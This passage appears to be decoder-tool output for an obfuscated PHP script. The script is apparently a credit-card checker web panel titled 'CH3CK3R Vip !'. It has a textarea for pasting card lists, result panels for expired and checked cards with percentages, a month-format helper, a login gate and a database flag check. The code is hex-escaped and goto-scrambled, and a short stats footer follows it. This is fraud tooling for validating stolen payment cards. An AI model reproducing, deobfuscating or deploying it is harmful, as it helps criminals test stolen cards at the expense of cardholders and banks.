($ccexp != '') { echo "\74\x68\62\76\74\146\x6f\x6e\x74\40\x63\157\154\x6f\162\75\162\145\x64\76\x45\170\160\74\57\x66\x6f\156\x74\76\x20{$per4}\x20\45\x20\x28" . (count(explode("\12", $ccexp)) - 1) . "\x2f" . count($cclist) . "\51\x3c\57\x68\x32\76"; echo "\74\164\x65\170\164\141\162\145\141\40\x77\162\x61\x70\x3d\x6f\x66\x66\x20\162\x6f\167\163\x3d\x31\60\x20\x73\164\171\x6c\145\75\42\167\151\x64\164\150\x3a\71\x30\x25\42\76{$ccexp}\74\x2f\164\x65\170\164\x61\162\x65\x61\76\74\x62\x72\x3e"; } if ($cccant != '') { echo "\74\x68\x32\76\x3c\146\157\x6e\x74\x20\143\x6f\x6c\157\162\75\x6f\x72\141\156\147\145\76\x43\150\x65\x63\153\145\162\x20\x43\x43\163\x3c\57\146\x6f\156\x74\x3e\x20{$per5}\40\x25\x20\50" . (count(explode("\xa", $cccant)) - 1) . "\57" . count($cclist) . "\x29\74\x2f\x68\x32\x3e"; echo "\74\164\145\170\x74\141\x72\x65\141\40\x77\162\x61\160\x3d\157\146\x66\40\x72\x6f\x77\163\x3d\x31\x30\40\x73\164\171\x6c\x65\75\x22\x77\151\x64\164\x68\x3a\71\60\45\x22\x3e{$cccant}\x3c\x2f\x74\145\170\x74\141\x72\x65\x61\x3e\74\142\162\x3e"; } } else { ?>
<form action=""method="POST"><fieldset><legend></legend><form action=""method="post"name="f"><link crossorigin="anonymous"href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css"integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7"rel="stylesheet"><link crossorigin="anonymous"href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap-theme.min.css"integrity="sha384-fLW2N01lMqjakBkx3l/M9EahuwpSfeNvV63J5ezn3uZzapT0u7EYsXMjQV+0En5r"rel="stylesheet"><script crossorigin="anonymous"integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS"src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script><center><br><textarea class="textarea"id="cclist"name="cclist"style="width:900px;height:200px"></textarea><br><br><?php  if ($row["\x6d\137\146\154\141\147"] == 0) { ?>
<input class="btn btn-success"style="width:200px;height:40px"value="CHECK"name="submit"type="submit"><?php  } else { ?>
<input class="btn btn-success"style="width:200px;height:40px"value="wrong"><?php  } ?>
</center></p></form></fieldset><?php  } goto YUJIz; JSl67: error_reporting(0); goto gFgaY; vv5M_: function checkMon($date, $type) { $len = strlen($date); if ($type == 2) { if ($len == 2) { return $date; } elseif ($len == 1) { switch ($date) { case "\61": $date = "\x30\61"; break; case "\x32": $date = "\60\62"; break; case "\x33": $date = "\60\x33"; break; case "\64": $date = "\x30\x34"; break; case "\x35": $date = "\x30\65"; break; case "\66": $date = "\x30\x36"; break; case "\67": $date = "\x30\67"; break; case "\70": $date = "\x30\x38"; break; case "\71": $date = "\x30\x39"; break; } } return $date; } elseif ($type == 1) { if ($len == 2) { switch ($date) { case "\60\61": $date = "\x31"; break; case "\x30\x32": $date = "\62"; break; case "\x30\x33": $date = "\63"; break; case "\x30\64": $date = "\64"; break; case "\x30\65": $date = "\65"; break; case "\60\66": $date = "\x36"; break; case "\x30\67": $date = "\67"; break; case "\60\70": $date = "\x38"; break; case "\x30\71": $date = "\71"; break; case "\61\60": $date = "\x31\60"; break; case "\x31\x31": $date = "\x31\x31"; break; case "\x31\62": $date = "\61\62"; break; } return $date; } elseif ($len == 1) { return $date; } } else { return false; } } goto adTeI; A83lW: if ($auth == 1) { if (@$_POST["\x6c\157\147\151\156"] == $login && @$_POST["\160\x61\x73\163\167\157\162\144"] == $password) { $_SESSION["\141\x6e"] = 1; } } else { $_SESSION["\x61\156"] = "\61"; } goto p1DEQ; ZifgZ: echo "\103\x6f\156\x6e\145\143\164\145\x64\x20\x73\165\x63\143\145\163\163\146\165\154\154\171"; goto F3Slv; cQ6JK: $result = $conn->query($sql); goto Uy4F6; FFv6o: function getStr($string, $start, $end) { $str = explode($start, $string); $str = explode($end, $str[1]); return $str[0]; } goto vv5M_; IcgkZ: $style = "\x3c\123\124\131\x4c\x45\76\102\x4f\x44\x59\173\142\141\x63\153\x67\x72\x6f\x75\x6e\x64\x2d\x63\157\x6c\157\162\x3a\x20\x23\60\60\x30\60\x30\x30\73\x20\x62\x61\x63\x6b\x67\162\x6f\165\156\x64\72\x20\x75\162\x6c\50\x68\164\x74\160\x3a\x2f\57\167\x77\167\56\172\145\x6d\167\141\x6c\x6c\160\x61\160\x65\x72\163\56\x63\x6f\155\x2f\x77\160\x2d\x63\157\156\164\145\x6e\164\x2f\165\160\154\x6f\x61\144\x73\57\x32\x30\61\65\57\60\67\57\106\x75\x6c\x6c\55\x48\x64\x2d\127\151\x64\x65\163\x63\162\x65\x65\156\x2d\127\x61\x6c\x6c\160\141\x70\145\162\163\55\x31\x39\62\60\x58\61\x30\70\x30\55\x37\56\152\160\147\51\x3b\143\x6f\x6c\x6f\x72\x3a\40\x23\x43\61\x43\x31\x43\x37\x3b\146\x6f\156\164\x3a\40\70\x70\x74\x20\166\x65\x72\144\141\x6e\141\54\40\147\x65\x6e\145\x76\x61\54\x20\154\165\143\x69\144\141\54\40\x27\154\165\x63\151\x64\x61\x20\147\162\x61\156\144\145\x27\x2c\x20\x61\162\151\x61\154\54\x20\x68\x65\x6c\x76\x65\x74\151\143\141\x2c\40\x73\x61\x6e\163\x2d\163\x65\162\x69\146\x3b\x4d\x41\122\107\x49\x4e\x2d\x54\117\120\72\40\60\x70\170\73\115\101\122\x47\x49\116\x2d\102\117\124\x54\117\115\72\40\x30\x70\x78\73\115\101\x52\x47\111\x4e\55\x4c\105\106\x54\72\x20\60\160\170\73\x4d\x41\122\107\111\x4e\x2d\x52\111\107\x48\124\x3a\x20\x30\160\x78\73\155\x61\x72\147\x69\x6e\x3a\x30\x3b\160\141\144\144\151\156\x67\x3a\60\x3b\x73\143\x72\157\x6c\154\142\x61\x72\55\146\x61\x63\x65\55\143\157\x6c\x6f\162\x3a\x20\43\63\63\x36\x36\x30\60\x3b\163\x63\x72\157\154\154\x62\x61\162\55\163\150\141\144\x6f\167\55\x63\x6f\154\x6f\x72\72\x20\x23\x33\x33\63\63\x33\x33\x3b\x73\x63\162\x6f\x6c\154\142\141\x72\x2d\x68\x69\147\x68\154\x69\147\150\x74\55\x63\x6f\154\x6f\x72\72\x20\43\63\x33\x33\63\x33\63\73\x73\143\x72\x6f\x6c\x6c\142\x61\162\x2d\63\x64\154\151\x67\150\164\55\x63\157\154\157\x72\72\x20\43\x33\x33\63\x33\x33\x33\x3b\x73\x63\162\157\x6c\x6c\142\141\x72\x2d\x64\141\x72\153\163\x68\141\x64\x6f\167\55\x63\157\154\157\162\x3a\x20\43\x33\63\63\x33\x33\63\73\163\x63\162\157\x6c\154\142\x61\x72\55\164\x72\141\143\153\x2d\143\157\154\157\162\72\40\43\63\x33\63\x33\x33\63\73\163\x63\162\x6f\154\x6c\142\x61\x72\55\x61\x72\162\157\x77\x2d\143\157\x6c\x6f\x72\x3a\x20\43\63\63\63\63\63\63\73\x7d\x69\156\x70\x75\164\x7b\142\x61\143\153\147\x72\x6f\x75\156\144\55\x63\157\x6c\x6f\x72\72\x20\x23\x31\x32\x31\62\x31\64\x3b\146\157\156\x74\55\163\x69\x7a\145\72\x20\x38\160\x74\73\143\157\x6c\x6f\x72\x3a\40\43\x43\x31\x43\x31\103\x37\73\146\x6f\156\164\x2d\146\x61\x6d\151\154\x79\72\40\124\141\x68\x6f\x6d\x61\73\x62\157\162\x64\x65\162\72\x20\x31\x20\x73\157\x6c\151\144\x20\43\66\66\66\x36\x36\66\x3b\175\164\145\x78\x74\141\162\145\141\x7b\x62\x61\x63\153\147\x72\x6f\x75\x6e\x64\x2d\143\157\x6c\x6f\162\72\40\43\63\63\63\63\63\63\73\x66\157\156\x74\55\x73\151\x7a\x65\72\40\x38\x70\164\73\x63\x6f\x6c\x6f\x72\72\x20\43\106\106\106\x46\106\x46\73\146\x6f\156\164\55\146\x61\155\x69\154\x79\72\x20\x54\141\150\x6f\x6d\x61\73\142\x6f\162\144\x65\162\x3a\x20\x31\x20\x73\157\154\151\144\40\43\66\x36\x36\x36\x36\x36\73\175\x61\72\x6c\x69\x6e\153\173\x63\x6f\154\157\162\x3a\x20\43\102\x39\102\x39\x42\x44\x3b\164\145\x78\x74\55\x64\x65\143\157\162\x61\x74\x69\x6f\x6e\72\x20\x6e\x6f\156\x65\73\x66\x6f\x6e\x74\55\163\151\172\x65\72\x20\x38\x70\164\73\x7d\141\72\x76\x69\163\x69\164\145\x64\x7b\x63\157\x6c\x6f\x72\x3a\40\x23\102\71\102\71\102\104\73\164\x65\170\164\55\x64\x65\143\x6f\x72\141\x74\x69\x6f\x6e\x3a\40\x6e\157\156\145\73\x66\x6f\x6e\x74\x2d\x73\x69\x7a\145\x3a\40\70\x70\164\73\x7d\x61\x3a\x68\x6f\x76\x65\x72\54\40\x61\x3a\141\x63\x74\151\x76\x65\173\143\157\x6c\157\x72\72\40\43\105\x37\105\x37\x45\102\x3b\164\145\170\x74\x2d\144\x65\x63\x6f\x72\x61\164\x69\x6f\x6e\72\40\x6e\x6f\156\x65\x3b\x66\x6f\156\x74\55\163\x69\172\145\72\40\70\160\164\x3b\175\x74\144\x2c\x20\x74\150\x2c\40\x70\54\x20\154\x69\173\146\x6f\156\164\72\x20\70\160\x74\40\x76\145\x72\x64\141\156\141\54\x20\147\x65\x6e\x65\166\x61\54\x20\x6c\x75\143\x69\144\x61\x2c\x20\47\154\165\x63\151\144\141\40\147\162\x61\156\144\145\x27\54\x20\x61\162\151\x61\154\x2c\40\x68\x65\154\x76\145\164\x69\143\x61\54\40\163\x61\156\x73\x2d\163\x65\x72\151\146\x3b\142\157\162\144\x65\x72\55\143\x6f\154\x6f\x72\x3a\x62\154\141\143\x6b\73\x7d\74\57\163\x74\x79\x6c\x65\x3e"; goto bW4MD; Kp1A2: set_time_limit(0); goto ekcTY; bW4MD: $header = "\x3c\x68\x74\x6d\154\76\x3c\x68\145\141\x64\76\x3c\154\x69\156\153\x20\162\145\154\75\42\x53\x48\x4f\122\x54\103\x55\124\x20\111\x43\117\x4e\42\40\150\x72\145\146\x3d\42\42\76\x3c\164\x69\x74\154\145\x3e\x43\x48\x33\x43\113\63\122\x20\126\x69\x70\x20\x21\74\x2f\x74\151\x74\x6c\x65\x3e\x3c\155\x65\164\141\x20\150\x74\x74\160\55\x65\161\165\x69\166\75\x22\x43\x6f\x6e\164\145\x6e\x74\x2d\124\171\160\145\42\x20\143\x6f\x6e\x74\145\x6e\x74\75\x22\x74\x65\170\x74\x2f\150\x74\x6d\154\73\40\143\150\x61\x72\163\145\164\x3d\x77\x69\156\x64\x6f\167\x73\x2d\61\x32\65\x31\x22\76" . $style . "\74\x2f\150\x65\x61\144\x3e\x3c\x42\117\104\131\40\154\x65\146\x74\x4d\141\x72\147\x69\x6e\x3d\x30\x20\x74\157\160\x4d\141\162\x67\151\x6e\75\x30\40\x72\x69\147\x68\x74\x4d\x61\x72\x67\151\x6e\x3d\x30\40\155\x61\x72\147\151\x6e\x68\x65\x69\147\x68\x74\x3d\x30\40\155\x61\162\147\151\x6e\x77\151\x64\x74\x68\75\x30\x3e"; goto DCh2G; lrEBR: function percent($num_amount, $num_total) { $count1 = $num_amount / $num_total; $count2 = $count1 * 100; $count = number_format($count2, 0); return $count; } goto FFv6o; g7Fn4: $password = ''; goto ZTwgQ; F3Slv: $sql = "\x53\105\x4c\x45\x43\x54\40\x6d\137\x66\x6c\141\x67\x20\106\x52\117\115\x20\165\x73\x65\162\x5f\146\154\x61\147"; goto cQ6JK; YUJIz: ?>

Function Calls

None

Variables

None

Stats

MD5 be56890167753964873f5b216378cdea
Eval Count 0
Decode Time 51 ms